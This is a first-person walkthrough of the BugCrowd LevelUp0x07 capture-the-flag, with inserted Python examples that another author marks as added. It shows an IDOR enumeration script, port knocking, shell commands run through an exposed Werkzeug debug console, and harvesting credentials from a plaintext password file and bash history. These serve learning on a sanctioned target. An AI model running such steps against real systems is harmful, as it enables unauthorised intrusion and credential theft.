LevelUp0x07 CTF Complete Walkthrough ⛳

Hey guys, today I am going to show you my walkthrough for the CTF run by BugCrowd from 08/17/2020 to 08/21/2020. In this post I will describe my mindset and all the strategies I used to retrieve all 7 flags and defeat the evil agency trying to deploy the WannaSpy virus!!

Before the Challenge: I started the CTF by reading the page provided by BugCrowd here, where they described all the rules and how the CTF is supposed to work. This step does not sound “essential” for the CTF, but it is actually very important, because it is here that you can narrow down a lot of the tools and methods to use. In the description they explicitly explain that each flag varies in difficulty, with the first flag being the easiest and the last being the hardest; that the flag format is ‘flag{}’; that if you’ve found a flag it means you are in the right area and should explore your surroundings to get on the correct path to the next flag; and how and where to submit all flags. I am saying this because I saw a lot of people on the Discord channel asking questions that were already answered in the CTF description, showing that a fair part of the participants didn’t take the time to read the instructions and jumped right into the challenge. So that is why it is good to READ ALL INSTRUCTIONS. Nice, now that we have read everything, let’s go to the target they provided 🙂

1. First Flag: The only “in scope” target provided for this CTF was this URL. There you see what looks like a terminal telling you which commands are valid. I entered the ‘brief’ command because that is what the initial message was suggesting, and after entering it a new message displayed: agent cje told us that Agent Craigie was able to plant a radio at the endpoint /radio. Before visiting that endpoint I wanted to test whether I could type anything else into the terminal that would display something it was not supposed to, for example ‘ls’, ‘whoami’, ‘pwd’, etc. Nothing worked, so I moved on to the https://07.levelupctf.com/radio page. It displayed a login form, which was weird because it does not look like what you would expect from a /radio directory. So then, as I always like to do before using any kind of external tool or exploitation, I inspected the page, taking into consideration that this was the first flag so you couldn’t expect much difficulty. I was looking for comments that the developers may have left on the page, and sure enough, the first flag was there: under the Network tab of the browser dev tools, in the login.js file, searching for the keyword ‘flag’ with the ctrl + f shortcut displayed the first flag.
Image


2. Second Flag: Alright, with the first flag down, I saw that there was more in the same comment: it showed a JS function which returns this URL. I copied it, and after pasting it into the browser it redirected me to a download page offering an .APK file. After downloading it I transferred it to my Google Drive account, from which I downloaded it into the Android Studio smartphone emulator, which you can have a look at here.

Image

I then started inspecting the app, and the result was just a simple login page with an image of an open folder with “confidential” written on it, and a hidden image that, if you clicked on it, displayed a dumpster on fire (yes, when I saw that I really didn’t know how to react to it :v).

After analyzing the app a little more and seeing that there was nothing to do in it unless I logged in to an account, for which I didn’t know the credentials, I used the best tool ever created to ‘reverse engineer’ an .APK file, MobSF (Mobile Security Framework). It is so good that I still can’t believe the creators have open-sourced it and given it away for free. It analyzes the file and displays any vulnerabilities the app has, and it also organizes all the files used by the app by category. It is so simple that it even provides a GUI; you can run it in Docker with these commands:

docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

After doing so I uploaded the apk file on it and that was the outcome:

Image

After that I literally searched for the word ‘flag’ once again using the ctrl + f shortcut, and there it was under the Strings category:

Image

3. Third Flag: Now things start getting a little more interesting. After a while of looking around and taking some more notes in my notepad, I remembered one of the instructions in the CTF description saying that if you’ve found a flag it means you are in the right area and should explore your surroundings to get on the correct path to the next flag. So I kept looking for more hints, and after inspecting the decompiled source I found MainActivity.java. For those new to mobile app bug bounty and those with no experience at all (me): “MainActivity.java is one of the most important files in Android Studio. It is inside this file that you define methods, functions, data types and variables.” I took this quote from this video, feel free to check it out. I didn’t know about it, so that was something I learned thanks to this CTF 🙂. Anyway, I inspected this file and found two interesting functions (decompiled, so a few artifacts remain). The first builds a POST request to a hidden “forgotpassword” endpoint:

 String URL = "https://07.levelupctf.com"; 

 // Posts the username typed in the app to the hidden forgot-password endpoint.
  public void forgotPassword(View view) throws IOException {
        EditText username = (EditText) findViewById(R.id.username);
        if (username.getText() != null && !username.getText().toString().isEmpty()) {
            OkHttpClient webclient = new OkHttpClient();
            RequestBody post_body = new FormBody.Builder().add("username", username.getText().toString()).build();
            Request.Builder builder = new Request.Builder();
            webclient.newCall(builder.url(this.URL + "/d41d8cd98f00b204e9800998ecf8427e/8cd98f00b204e9800998/forgotpassword").post(post_body).build()).execute().code();
        }
  }

And another one that puts a key from the app resources into a 3NCRYPT3D-CH4T header to reach a chat page (the decompiled method builds the request but never sends it, which is why I had to replay it myself):

public void encryptedChat() {
        String key = getApplicationContext().getString(R.string.encrypted_chat_key);
        new OkHttpClient(); // decompiler leftover: client is created but unused
        Request.Builder builder = new Request.Builder();
        // the request is built with the header but never executed
        Request build = builder.url(this.URL + "/fa694c73da13c94e49cc82b/06a28bdb78b6c02e16862a3/chat").header("3NCRYPT3D-CH4T", key).build();
    }

I inspected both pages. First I went to the ‘forgotpassword’ page; it was asking for a username, and I didn’t know any (well, I tried agent Craigie, who was the one that opened the /radio page for us, and cje, who gave us the briefing, but nothing worked). For the second page I needed a key, so I went back to the Strings page where I had taken the second flag and searched for the word ‘key’. Sure enough, one was displayed: “encrypted_chat_key” : “8b0955d2682eb74347b9e71ea0558c67”. Couldn’t be more obvious, right 😉. So I used curl to put all this together:

curl -H "3NCRYPT3D-CH4T:8b0955d2682eb74347b9e71ea0558c67" \
     -O https://07.levelupctf.com/fa694c73da13c94e49cc82b/06a28bdb78b6c02e16862a3/chat

I used the -O flag to save the response to a file (named chat, after the last path segment), then opened it in Firefox (note that if you open it with another browser it may only display the raw code and not how the page is supposed to be rendered, but that does not affect the process at all, it is simply more organized!). I saw a chat room with 4 different users: agent_nova, agent_tal, agent_521bcd5 and agent_5a247455. I took these usernames to the ‘forgotpassword’ page and only two worked, agent_521bcd5 and agent_5a247455. For agent_521bcd5 it asked ‘what is the name of your favourite lion’ and for agent_5a247455 ‘what is your favourite hobby’.

After that I went back to the chat and saw that the conversation was encrypted with a cipher. It didn’t look hard to translate, because it was obvious that the letters had only been shifted, so the Caesar cipher came to mind, one of the first encryption techniques ever created (very cool stuff, I recommend having a look here). Of course I then searched for Caesar cipher decoders, clicked on the first website and started decrypting the conversation. The output was this:

- meow
- message deleted
- Have you got word on our new mission yet?
- yeah we do, check the “mission list”. they caught some HACK Agent as well.
- thats crazy, anyways check out this dope giraffe I saw at the zoo the other day:
- *shows a picture of a giraffe*
- hahahaha thats awesome
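For anyone who would rather not paste agency chatter into a random website, here is the Caesar brute force in Python. This is an added example, not code from the original post or from the CTF: it tries all 26 shifts and ranks them by how many English words come out, scoring the whole conversation at once because a single short line like “meow” cannot be ranked on its own. The real ciphertext is not reproduced in the post, so the sample below encrypts the decoded lines itself (a constructed input); the small word list is also mine.

```python
import string

# Constructed sample: the decoded chat lines quoted in the walkthrough. The real
# ciphertext is not reproduced in the post, so the demo encrypts these itself.
SAMPLE_PLAINTEXT = [
    "meow",
    "Have you got word on our new mission yet?",
    'yeah we do, check the "mission list". they caught some HACK Agent as well.',
    "thats crazy, anyways check out this dope giraffe I saw at the zoo the other day:",
]

# Small English word list (an assumption of this example) used to rank shifts.
COMMON_WORDS = {
    "the", "you", "our", "on", "we", "do", "they", "as", "well", "some", "new",
    "yet", "check", "got", "word", "out", "this", "saw", "at", "zoo", "other", "day",
}


def shift_text(text, shift):
    """Rotate every ASCII letter by `shift` places (Caesar cipher), keeping case
    and leaving digits, spaces and punctuation untouched. Negative shifts decrypt."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - ord("a") + shift) % 26 + ord("a")))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            out.append(ch)
    return "".join(out)


def english_score(text):
    """Count dictionary words in `text`; higher means more English-looking."""
    words = (w.strip(string.punctuation).lower() for w in text.split())
    return sum(1 for w in words if w in COMMON_WORDS)


def candidates(lines):
    """All 26 decryptions of a conversation with their scores. One shift is
    assumed for the whole chat, so the lines are scored together."""
    joined = "\n".join(lines)
    return [(s, english_score(shift_text(joined, -s))) for s in range(26)]


def crack_caesar(lines):
    """Return (shift, decoded_lines) for the best-scoring shift."""
    best_shift = max(candidates(lines), key=lambda c: c[1])[0]
    return best_shift, [shift_text(line, -best_shift) for line in lines]


if __name__ == "__main__":
    ciphertext = [shift_text(line, 7) for line in SAMPLE_PLAINTEXT]  # simulate the chat
    shift, plaintext = crack_caesar(ciphertext)
    print(f"shift={shift}")
    for line in plaintext:
        print("-", line)
```

If the scoring ties (very short or very unusual text), print `candidates(lines)` and eyeball the top few shifts; with a whole conversation the correct shift normally wins by a wide margin.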

Well, as we can see, the only thing that looks interesting at first glance is this “mission list”, and I’ll admit I spent a long time searching for a directory or hidden message about it 😅. After a while I came back to the chat and learned a lesson: don’t get too excited and miss the rest of the clues. Going back and forth, I realised that agent_521bcd5’s password reset question asked for the name of his favourite lion, and the funny thing is that he posted a photo of a giraffe. So it came to my mind to explore the metadata of the image and check whether anything was hidden in it, because that is the closest thing to a lion we had at that point. I used this website to check it, but you can also use the exiftool command that ships with Kali Linux. And there it was, our third flag!!!

Image

4. Fourth Flag: Alright, for this one I used a bit of common sense, because again the hint for the next flag is always close to where you found the last one. After a while I started asking myself: ‘ok, so agent_521bcd5 took this photo in a zoo, and the question for his password reset asks for the name of his favourite lion; what if I take the GPS position from the image metadata, use it to find the name of the zoo, and then search for the zoo’s name plus “lion” to see if I can find an article or blog mentioning this lion?’ So that is what I did!!! I got the position 37° 43′ 58.53″ N, 122° 30′ 8.48″ W, searched it on Google, and it was exactly where the San Francisco Zoo is located. Then I searched for ‘San Francisco Zoo lion name’, and after scrolling a little and learning that lions sleep 20 hours a day (guess I could be a lion), there was an article mentioning the lion Jahari and his death at 16 years old. I typed this name into the ‘forgotpassword’ page as agent_521bcd5 and there it was, the password to log in to his account :0. Then I went to the https://07.levelupctf.com/login page and typed user: agent_521bcd5, password: 9a76a913ee9ae8d5b2

Image

Then, as any good bug hunter usually does, I started clicking on everything I could and couldn’t find any flags. The only thing I encountered was a page with a bunch of target photos, and on some of them there were some random numbers that seemed useless at the time (btw, that is a foreshadow 🧐). Then I remembered the /radio endpoint that agent Craigie left for us and went there again, but this time logged in as agent_521bcd5, and ta-da: a message started displaying with a really nice 2003-hacker-movie effect (I even went to the source of the page to see which layout or technique they were using, and after some searching, here is the Bootstrap layout used, for those interested), our fourth flag.

Image

5. Fifth Flag: For this one I spent a long time on the link they provided explaining “how to exfiltrate via ping”, I would say at least a few hours, really, I was fully dedicated to it. But in the end I saw that it was pointless and that the flag was probably somewhere else. I stopped and said: alright, the tip for the next flag is always close to the flag you just got; if the link seems pointless for this flag, let’s try the other tips the agent gave us. First tip: obelisk hides missions in images. Second tip: pwn3llthebugz. With these two things I started downloading all the target photos and checked them one by one for anything hidden in the metadata, and nothing interesting was found. Then I used the only other technique I knew of that serves the purpose of hiding things in images, steganography. I went to this website to decode them, using the secret provided by the agent as the password, but again nothing seemed to work.

After taking a rest, because I got really stressed at this part 😅, I asked on the Discord server for a tip for this flag, and a really nice guy messaged me explaining that not all agents were being displayed!!! After some reflection I finally understood that he was referring to an IDOR bug; I asked him and he confirmed!!! IDOR (Insecure Direct Object Reference) happens when a site uses an identifier you control to look up an object without checking that you are allowed to see it: for example, logged in as user 1 you see www.mywebsite.com/?=user1, you change it to /?=user2, and all of user 2’s information, which you were never supposed to see, is shown to you. So I started iterating over all the agents, because as shown in their URLs all of them had the format https://07.levelupctf.com/agents/agent01.jpg, https://07.levelupctf.com/agents/agent02.jpg, https://07.levelupctf.com/agents/agent03.jpg, etc.
After almost giving up and seeing a lot of blank pages, I finally found agent 87 and was able to download his image (was this the most efficient way to do it? Probably not, but it worked! I got goosebumps when it happened). Then I repeated the same process as with the other agents, and finally I had my hands on flag number five after using the steganography site with image: agent87.jpg (the image was .jpg but the site was asking for a .jpeg extension, so I renamed it) and password: pwn3llthebugz. The message that displayed the flag was:
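Walking agent01 to agent99 by hand is how I did it, but the enumeration is the whole point of an IDOR, so here is the same thing scripted. This is an added example of mine, not code from the original post or the CTF. It assumes the two-digit zero-padded URL pattern quoted above and checks each candidate with a HEAD request; to run offline it also ships a constructed stand-in fetcher that pretends only agents 01, 02, 03 and 87 exist (the real set of hidden agents is not known to me).

```python
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor

# URL pattern seen in the walkthrough: two-digit, zero-padded agent numbers.
AGENT_URL = "https://07.levelupctf.com/agents/agent{:02d}.jpg"


def http_status(url, timeout=10):
    """Live fetcher: HEAD request, returns the HTTP status (0 on network error).
    Only point this at a target you are authorised to test."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except (urllib.error.URLError, OSError):
        return 0


def make_offline_fetcher(existing_ids):
    """Constructed stand-in for http_status so the example runs without network:
    answers 200 only for the ids in `existing_ids`, 404 for everything else."""
    present = {AGENT_URL.format(i) for i in existing_ids}
    return lambda url: 200 if url in present else 404


def enumerate_ids(fetch, template=AGENT_URL, start=1, stop=100, workers=8):
    """Try every id in [start, stop] and return those the server serves (HTTP 200).
    The id is the only 'access control' on these images, so any logged-in user
    can walk the whole range; that missing authorisation check is the IDOR."""
    ids = list(range(start, stop + 1))
    with ThreadPoolExecutor(max_workers=workers) as pool:
        statuses = list(pool.map(lambda i: fetch(template.format(i)), ids))
    return [i for i, status in zip(ids, statuses) if status == 200]


if __name__ == "__main__":
    # Offline demo: only agents 01, 02, 03 and 87 "exist" in this constructed set.
    found = enumerate_ids(make_offline_fetcher({1, 2, 3, 87}), stop=100)
    print("agents served:", found)
    # Against the live target you would pass the real fetcher instead:
    # found = enumerate_ids(http_status, stop=100)
```

The fix on the server side is the mirror image: look up the object, then check that the requesting user is allowed to see it, rather than relying on the image not being linked from any page (unguessable identifiers help, but are not a substitute for that check).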

Dear agent_521bcd5,

        As ordered by Matriarch, I have created a backdoor console that will allow us to launch WannaSpy when time is right.

        We're not worried about anyone getting in since they have to go through many doors to actually get in.

        Once you are ready, you will find that the console lives on 3389.

        FLAG{censored}

        Regards
        agent_1337

6. Sixth Flag: This one was the hardest in my opinion, because I had to learn a technique I had never heard of before!!! Ok, so I started by trying to interpret the message. I read it line by line and tried to understand what agent_1337 was talking about. I understood that by ‘doors’ she meant something like ports, because that is the term I usually use to explain to people what ports are, and once I was ready I would find the console living on port 3389 (maybe RDP!?). Then I went straight to Nmap and scanned the host to see which ports were open and whether I could at least understand what she meant by all that.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-18 23:53 EEST
Nmap scan report for 07.levelupctf.com (165.227.54.122)
Host is up (0.18s latency).
Not shown: 65524 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
135/tcp   filtered msrpc
136/tcp   filtered profile
137/tcp   filtered netbios-ns
138/tcp   filtered netbios-dgm
139/tcp   filtered netbios-ssn
443/tcp   open     https
445/tcp   filtered microsoft-ds
3389/tcp  filtered ms-wbt-server
11211/tcp filtered memcache

That was the output. I messed around trying to connect to those ports and squeeze any information I could out of them; to be honest, in the end it was not worth the time at all. So off to the Discord again to see if anyone was struggling with the same issue, and I started seeing people mentioning ports and knocking in the chat room!?!? Then I thought, well, it kind of makes sense, because the agent was talking about doors, and knocking is usually what we do with those, right!? And sure enough, I learned something new: port knocking!!! This is a security technique used to hide a service: the firewall keeps its port closed, and only after a client ‘knocks’ on a specific sequence of ports, for example 123, 568, 8999, does the daemon open the protected port for that client. A very nice technique that I was really surprised by. Alright, now what!? How do I figure out which ports to knock!? Well… remember that foreshadow I was talking about, those random numbers? Here they come. Those numbers had been bothering me for some time because I couldn’t see a way to use them, but thinking it all through, they all had the length of port numbers and were neatly positioned in a way that could indicate the sequence of the knock. After searching a little more for which tools to use I came across this tool, made especially for that, then I knelt down and started typing as if there was no tomorrow:

knock 165.227.54.122 1337 415 2099 921 3389  #i had gotten the ip of the website during the nmap scan

but at first, when I accessed the page 165.227.54.122:3389, it didn’t work, so I kept trying other port orders:

knock 165.227.54.122 1337 415 2099 921 
knock 165.227.54.122 415 1337 2099 921 3389
knock 165.227.54.122 2099 415 1337 921 3389

and after only a few tries (I think the server was responding with a delay and the first command was actually right) I had access to the page!!!
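To show what the knock actually does on the other side, here is both halves of the exchange in Python. This is an added example of mine, not code from the original post, the CTF or the knock tool: a tiny knockd-style server that keeps a protected port refused until one client hits the secret ports in order, plus a knock() client equivalent to the `knock <host> <ports...>` command above. The real sequence (1337 415 2099 921 opening 3389) includes a privileged port, so the offline demo binds free high ports instead and reports them; a real knockd watches firewall logs or a packet capture for SYNs to closed ports, while this demo simply accepts the connections, which is a simplification so it runs without root.

```python
import socket
import threading

# Sequence read off the target photos in the walkthrough, opening the console
# on 3389. The offline demo below cannot bind 415 as an unprivileged user, so
# it picks free high ports instead and exposes them as server.sequence.
CTF_SEQUENCE = [1337, 415, 2099, 921]
CTF_PROTECTED_PORT = 3389


class KnockServer:
    """Minimal knockd-style daemon for localhost. It listens on every port of
    a secret sequence and starts listening on the protected port only after
    one client has hit the sequence in the right order. A real knockd watches
    firewall logs or a packet capture for SYNs to *closed* ports; accepting
    TCP connections here is a simplification so the demo runs without root."""

    def __init__(self, sequence_length=4, host="127.0.0.1"):
        self.host = host
        self._lock = threading.Lock()
        self._progress = {}  # client ip -> index of the next knock expected
        self._listeners = [self._bind() for _ in range(sequence_length)]
        self.sequence = [s.getsockname()[1] for s in self._listeners]
        # Bound but not listening: connects are refused until the knock succeeds.
        self._protected = self._bind()
        self.protected_port = self._protected.getsockname()[1]
        self.opened = threading.Event()

    def _bind(self):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind((self.host, 0))  # port 0: let the OS pick a free port
        return sock

    def start(self):
        for idx, sock in enumerate(self._listeners):
            sock.listen(5)
            threading.Thread(target=self._accept_knocks, args=(sock, idx), daemon=True).start()

    def _accept_knocks(self, sock, idx):
        while True:
            try:
                conn, (client_ip, _) = sock.accept()
            except OSError:  # listener shut down by stop()
                return
            self._register(client_ip, idx)
            conn.close()  # close only after registering, so knocks stay ordered

    def _register(self, client_ip, idx):
        with self._lock:
            expected = self._progress.get(client_ip, 0)
            if idx == expected:
                expected += 1
            else:  # wrong port: reset, but a hit on the first port restarts the sequence
                expected = 1 if idx == 0 else 0
            if expected == len(self.sequence):
                self._protected.listen(5)  # the "door" opens
                self.opened.set()
                expected = 0
            self._progress[client_ip] = expected

    def stop(self):
        for sock in self._listeners + [self._protected]:
            try:
                sock.shutdown(socket.SHUT_RDWR)
            except OSError:
                pass
            sock.close()


def knock(host, ports, timeout=1.0):
    """Client side, equivalent to `knock <host> <ports...>`: one TCP connect
    attempt per port, in order. Against a real knockd the ports are closed, so
    connect() fails and the SYN itself is the knock; against the demo server we
    wait for it to close the connection so every knock is registered in order."""
    for port in ports:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
            sock.recv(1)  # returns b"" once the server closes the knock connection
        except OSError:
            pass
        finally:
            sock.close()


def port_is_open(host, port, timeout=1.0):
    """True when a TCP handshake to host:port completes."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        return sock.connect_ex((host, port)) == 0
    finally:
        sock.close()


if __name__ == "__main__":
    server = KnockServer(len(CTF_SEQUENCE))
    server.start()
    print("knock sequence:", server.sequence, "protects port", server.protected_port)
    knock(server.host, list(reversed(server.sequence)))
    print("wrong order, open?", port_is_open(server.host, server.protected_port))
    knock(server.host, server.sequence)
    print("right order, open?", port_is_open(server.host, server.protected_port))
    server.stop()
```

Against the live target the equivalent is `knock(\"165.227.54.122\", CTF_SEQUENCE)` followed by `port_is_open(\"165.227.54.122\", CTF_PROTECTED_PORT)`; the delay I hit in the CTF is exactly why checking the port after the knock, rather than assuming, matters.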

Image

Then again I had to interpret another message. It said that they were still building it, which means that it is available but we are not supposed to access it?! But wait, wasn’t there supposed to be a CONSOLE here, as agent_1337 told us before? So I started typing random endpoints where a terminal could be stored, like 165.227.54.122:3389/terminal, 165.227.54.122:3389/command, 165.227.54.122:3389/control, 165.227.54.122:3389/bash, …….., 165.227.54.122:3389/console 🙂

Image

And there it was in all its glory, the thing I had been waiting for the whole time: the terminal!!! From here on it wasn’t hard compared to what we had done so far. It said in the bottom right corner of the page that it is a Werkzeug console (the interactive Python console of the Werkzeug debugger, which executes whatever you type on the server and should never be reachable from the network), so the first thing I thought of was to import Python’s subprocess module and see if I could list the files on the server the console was living on. I was getting a lot of syntax and invalid errors (I’m still learning Python 😅), so I went to see if anybody else had done this before, and of course IppSec had done something similar on the HackTheBox Ellingson box. Then it was as simple as copying what he had done in his console, and that is how we got our sixth flag!!!

    def run(cmd): from subprocess import getoutput;x=getoutput(cmd);print(x,end='\n')  # run a shell command, print its output
    run('ls -la')
    run('cat flag.txt')
Image

7. Seventh Flag: This last one was way easier than the previous flag, which was “a surprise to be sure, but a welcome one!”, because, as they had described, the difficulty should increase with each flag. Maybe they did that so we would overthink it, making it harder to solve?! Anyway, I was searching for some kind of privesc (I usually use this resource, for those interested) because I was sure the last flag was under the /root folder. I started narrowing down my options until I stumbled on the idea of checking the bash history, and after reading through it for a while I saw that the user had been messing around with a file called password.txt under the /opt directory. When I read the file, all the user credentials were there, even the matriarch’s.
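Reading the whole history by eye works on a CTF box, but on a real engagement you want to pull the interesting lines out automatically, so here is that check as an added example (my code, not the post’s or the CTF’s). It flags history lines that open a credential-looking file, like the cat of /opt/password.txt above, and lines that carry a secret inline (mysql -p…, curl -u user:pass, sshpass). The sample history is constructed for the demo and is not the real one from the box; the file-name and flag patterns are my assumptions and will miss anything they do not list.

```python
import re

# Constructed shell history, modelled on what the walkthrough found in the
# console's bash history (a password file under /opt). Not the real history.
SAMPLE_HISTORY = """\
ls -la /opt
cat /opt/password.txt
nano /opt/password.txt
mysql -u root -pS3cretPass agency
curl -u admin:hunter2 http://localhost/api
sudo systemctl restart nginx
"""

# A command opening a file whose name suggests credentials (patterns are an assumption).
SENSITIVE_FILE = re.compile(
    r"(?i)\b(?:cat|less|more|head|tail|vim?|nano|cp|scp)\s+"
    r"(\S*(?:passw(?:or)?d|cred|secret|token|\.env|id_rsa)\S*)"
)
# A credential typed inline on the command line (mysql -p, --password, curl -u, sshpass).
INLINE_CREDENTIAL = re.compile(
    r"(?:-p\S+|--password[= ]\S+|-u\s+\S+:\S+|sshpass\s+-p\s+\S+)"
)


def find_credential_leads(history_text):
    """Return (line_number, kind, match) for every history line that either
    opens a credential-looking file or carries a secret inline."""
    leads = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        m = SENSITIVE_FILE.search(line)
        if m:
            leads.append((lineno, "file", m.group(1)))
        m = INLINE_CREDENTIAL.search(line)
        if m:
            leads.append((lineno, "inline", m.group(0)))
    return leads


def scan_history_files(paths):
    """Run the same check over real history files, e.g. /root/.bash_history
    and /home/*/.bash_history, skipping any that cannot be read."""
    results = {}
    for path in paths:
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                results[path] = find_credential_leads(fh.read())
        except OSError:
            continue
    return results


if __name__ == "__main__":
    for lineno, kind, hit in find_credential_leads(SAMPLE_HISTORY):
        print(f"line {lineno}: {kind} -> {hit}")
```

From the Werkzeug console you would feed it the output of `run('cat /root/.bash_history /home/*/.bash_history')`, or call `scan_history_files` with those paths directly; every “file” hit is a path worth reading next, which is exactly how password.txt turned up.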

Image
My Reaction

Then of course I didn’t think twice, went to the login page, logged in as matriarch, and there it was, flag number 7 🙂

And that was it: after 2 whole days working on it, the challenge was completed and the evil agency had been defeated!!!

I would like to give special thanks to some users who helped with tips and suggestions along the way:

  • @BenkoOfficial
  • Cù Bòcan
  • machineyadav

What have I learned from it:

  • One of the coolest things was port knocking for sure, I would never have expected something like that
  • Improved my knowledge a lot about how smartphone applications work
  • Thinking outside the box is extremely important (as agent87 has shown us)
  • Do not leave passwords in plain text XD

Extra Notes: In the end, the app they provided didn’t actually have any functionality: if you typed the right credentials it would tell you to use the web interface instead.

That is it for today guys; as always, have a wonderful day.

Istvan out 🦁
